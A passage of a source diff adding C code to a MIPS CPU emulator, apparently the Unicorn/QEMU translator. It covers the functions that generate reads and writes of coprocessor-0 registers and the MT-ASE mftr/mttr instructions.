CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_EBase)); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); + rn = "Config"; + break; + case 1: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); + rn = "Config1"; + break; + case 2: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); + rn = "Config2"; + break; + case 3: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); + rn = "Config3"; + break; + case 4: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); + rn = "Config4"; + break; + case 5: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); + rn = "Config5"; + break; + /* 6,7 are implementation dependent */ + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); + rn = "Config6"; + break; + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); + rn = "Config7"; + break; + default: + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_dmfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, dmfc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, mfc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS3); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); + rn = "XContext"; + break; + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "'Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ + rn = "Debug"; + break; + case 1: +// gen_helper_dmfc0_tracecontrol(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceControl"; +// break; + case 2: +// gen_helper_dmfc0_tracecontrol2(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceControl2"; +// break; + case 3: +// gen_helper_dmfc0_usertracedata(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "UserTraceData"; +// break; + case 4: +// gen_helper_dmfc0_tracebpc(arg, tcg_ctx->cpu_env); /* PDtrace support */ + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); + rn = "Performance0"; + break; + case 1: +// gen_helper_dmfc0_performance1(arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_dmfc0_performance2(arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_dmfc0_performance3(arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_dmfc0_performance4(arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_dmfc0_performance5(arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_dmfc0_performance6(arg); + rn = "Performance6"; +// break; + case 7: +// gen_helper_dmfc0_performance7(arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "ECC"; + break; + case 27: + switch (sel) { + /* ignored */ + case 0: case 1: case 2: case 3: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); + rn = "DataHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("dmfc0 %s (reg %d sel %d)\n", rn, reg, sel); + return; + +cp0_unimplemented: + LOG_DISAS("dmfc0 %s (reg %d sel %d)\n", rn, reg, sel); + gen_mfc0_unimplemented(ctx, arg); +} + +static void gen_dmtc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS64); + + //if (use_icount) + // gen_io_start(); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + /* ignored */ + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + gen_helper_dmtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + gen_helper_dmtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Context"; + break; + case 1: +// gen_helper_mtc0_contextconfig(tcg_ctx->cpu_env, arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); + ctx->bstate = BS_STOP; + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + /* ignored */ + rn = "BadVAddr"; + break; + case 1: + /* ignored */ + rn = "BadInstr"; + break; + case 2: + /* ignored */ + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 10: + switch (sel) { + case 0: + gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 12: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); + /* BS_STOP isn't good enough here, hflags may have changed. */ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + /* Mark as an IO operation because we may trigger a software + interrupt. */ + //if (use_icount) { + // gen_io_start(); + //} + gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); + //if (use_icount) { + // gen_io_end(); + //} + /* Stop translation as we may have triggered an intetrupt */ + ctx->bstate = BS_STOP; + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + /* ignored */ + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 1: + /* ignored, read only */ + rn = "Config1"; + break; + case 2: + gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 3: + /* ignored */ + rn = "Config3"; + break; + case 4: + /* currently ignored */ + rn = "Config4"; + break; + case 5: + gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config5"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + /* 6,7 are implementation dependent */ + default: + rn = "Invalid config selector"; + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS3); + gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "XContext"; + break; + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + /* ignored */ + rn = "Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ + /* BS_STOP isn't good enough here, hflags may have changed. */ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Debug"; + break; + case 1: +// gen_helper_mtc0_tracecontrol(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceControl"; +// break; + case 2: +// gen_helper_mtc0_tracecontrol2(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceControl2"; +// break; + case 3: +// gen_helper_mtc0_usertracedata(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "UserTraceData"; +// break; + case 4: +// gen_helper_mtc0_tracebpc(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Performance0"; + break; + case 1: +// gen_helper_mtc0_performance1(tcg_ctx->cpu_env, arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_mtc0_performance2(tcg_ctx->cpu_env, arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_mtc0_performance3(tcg_ctx->cpu_env, arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_mtc0_performance4(tcg_ctx->cpu_env, arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_mtc0_performance5(tcg_ctx->cpu_env, arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_mtc0_performance6(tcg_ctx->cpu_env, arg); + rn = "Performance6"; +// break; + case 7: +// gen_helper_mtc0_performance7(tcg_ctx->cpu_env, arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + /* ignored */ + rn = "ECC"; + break; + case 27: + switch (sel) { + case 0: case 1: case 2: case 3: + /* ignored */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataHi"; + break; + default: + rn = "invalid sel"; + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("dmtc0 %s (reg %d sel %d)\n", rn, reg, sel); + /* For simplicity assume that all writes can cause interrupts. */ + //if (use_icount) { + // gen_io_end(); + // ctx->bstate = BS_STOP; + //} + return; + +cp0_unimplemented: + LOG_DISAS("dmtc0 %s (reg %d sel %d)\n", rn, reg, sel); +} +#endif /* TARGET_MIPS64 */ + +static void gen_mftr(CPUMIPSState *env, DisasContext *ctx, int rt, int rd, + int u, int sel, int h) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + TCGv t0 = tcg_temp_local_new(tcg_ctx); + + if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && + ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != + (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) + tcg_gen_movi_tl(tcg_ctx, t0, -1); + else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > + (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) + tcg_gen_movi_tl(tcg_ctx, t0, -1); + else if (u == 0) { + switch (rt) { + case 1: + switch (sel) { + case 1: + gen_helper_mftc0_vpecontrol(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_mftc0_vpeconf0(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 2: + switch (sel) { + case 1: + gen_helper_mftc0_tcstatus(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 2: + gen_helper_mftc0_tcbind(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 3: + gen_helper_mftc0_tcrestart(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 4: + gen_helper_mftc0_tchalt(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 5: + gen_helper_mftc0_tccontext(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 6: + gen_helper_mftc0_tcschedule(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + case 7: + gen_helper_mftc0_tcschefback(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mftc0_entryhi(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + case 12: + switch (sel) { + case 0: + gen_helper_mftc0_status(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + case 13: + switch (sel) { + case 0: + gen_helper_mftc0_cause(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 14: + switch (sel) { + case 0: + gen_helper_mftc0_epc(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 15: + switch (sel) { + case 1: + gen_helper_mftc0_ebase(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + break; + } + break; + case 16: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_mftc0_configx(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_const_tl(tcg_ctx, sel)); + break; + default: + goto die; + break; + } + break; + case 23: + switch (sel) { + case 0: + gen_helper_mftc0_debug(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + gen_mfc0(ctx, t0, rt, sel); + break; + } + break; + default: + gen_mfc0(ctx, t0, rt, sel); + } + } else switch (sel) { + /* GPR registers. */ + case 0: + gen_helper_1e0i(tcg_ctx, mftgpr, t0, rt); + break; + /* Auxiliary CPU registers */ + case 1: + switch (rt) { + case 0: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 0); + break; + case 1: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 0); + break; + case 2: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 0); + break; + case 4: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 1); + break; + case 5: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 1); + break; + case 6: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 1); + break; + case 8: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 2); + break; + case 9: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 2); + break; + case 10: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 2); + break; + case 12: + gen_helper_1e0i(tcg_ctx, mftlo, t0, 3); + break; + case 13: + gen_helper_1e0i(tcg_ctx, mfthi, t0, 3); + break; + case 14: + gen_helper_1e0i(tcg_ctx, mftacx, t0, 3); + break; + case 16: + gen_helper_mftdsp(tcg_ctx, t0, tcg_ctx->cpu_env); + break; + default: + goto die; + } + break; + /* Floating point (COP1). */ + case 2: + /* XXX: For now we support only a single FPU context. */ + if (h == 0) { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, rt); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } else { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32h(ctx, fp0, rt); + tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); + tcg_temp_free_i32(tcg_ctx, fp0); + } + break; + case 3: + /* XXX: For now we support only a single FPU context. */ + gen_helper_1e0i(tcg_ctx, cfc1, t0, rt); + break; + /* COP2: Not implemented. */ + case 4: + case 5: + /* fall through */ + default: + goto die; + } + LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + return; + +die: + tcg_temp_free(tcg_ctx, t0); + LOG_DISAS("mftr (reg %d u %d sel %d h %d)\n", rt, u, sel, h); + generate_exception(ctx, EXCP_RI); +} + +static void gen_mttr(CPUMIPSState *env, DisasContext *ctx, int rd, int rt, + int u, int sel, int h) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); + TCGv t0 = tcg_temp_local_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + if ((env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) == 0 && + ((env->tcs[other_tc].CP0_TCBind & (0xf << CP0TCBd_CurVPE)) != + (env->active_tc.CP0_TCBind & (0xf << CP0TCBd_CurVPE)))) + /* NOP */ ; + else if ((env->CP0_VPEControl & (0xff << CP0VPECo_TargTC)) > + (env->mvp->CP0_MVPConf0 & (0xff << CP0MVPC0_PTC))) + /* NOP */ ; + else if (u == 0) { + switch (rd) { + case 1: + switch (sel) { + case 1: + gen_helper_mttc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 2: + gen_helper_mttc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + default: + goto die; + break; + } + break; + case 2: + switch (sel) { + case 1: + gen_helper_mttc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 2: + gen_helper_mttc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 3: + gen_helper_mttc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 4: + gen_helper_mttc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, t0); + break; + case 5: + gen_helper_mttc0_tccontext(tcg_ctx, 